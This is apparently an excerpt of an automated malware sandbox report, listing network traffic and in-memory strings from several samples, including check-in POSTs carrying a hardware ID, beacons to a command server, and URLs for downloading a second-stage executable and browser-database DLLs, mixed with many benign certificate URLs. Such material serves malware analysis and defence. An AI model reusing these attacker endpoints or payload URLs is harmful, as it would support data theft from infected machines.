Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 91.215.85.66:9000

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCGCGCFHIDBFHIIJKJHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 41 35 37 39 42 41 33 33 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="hwid"3EA579BA33AD2322695909------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="build"default10------KEHCGCGCFHIDBFHIIJKJ--

Source: u5mc.0.exe, 00000001.00000002.2179506590.000000002A6B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u5mc.0.exe, 00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll1L
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllb
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllx
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll?
Source: u5mc.0.exe, 00000001.00000002.2179506590.000000002A6B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php8a7e6c3bfacd86a45ba1b49cd72a6releasef14ebdac6029838f7530c1
Source: u5mc.0.exe, 00000001.00000002.2129887694.000000000427A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpk
Source: u5mc.0.exe, 00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76=I
Source: MSBuild.exe, 0000000D.00000002.2895391729.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:
Source: MSBuild.exe, 0000000D.00000002.2895391729.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 0000000D.00000002.2895391729.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
Source: MSBuild.exe, 0000000D.00000002.2895391729.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08P
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
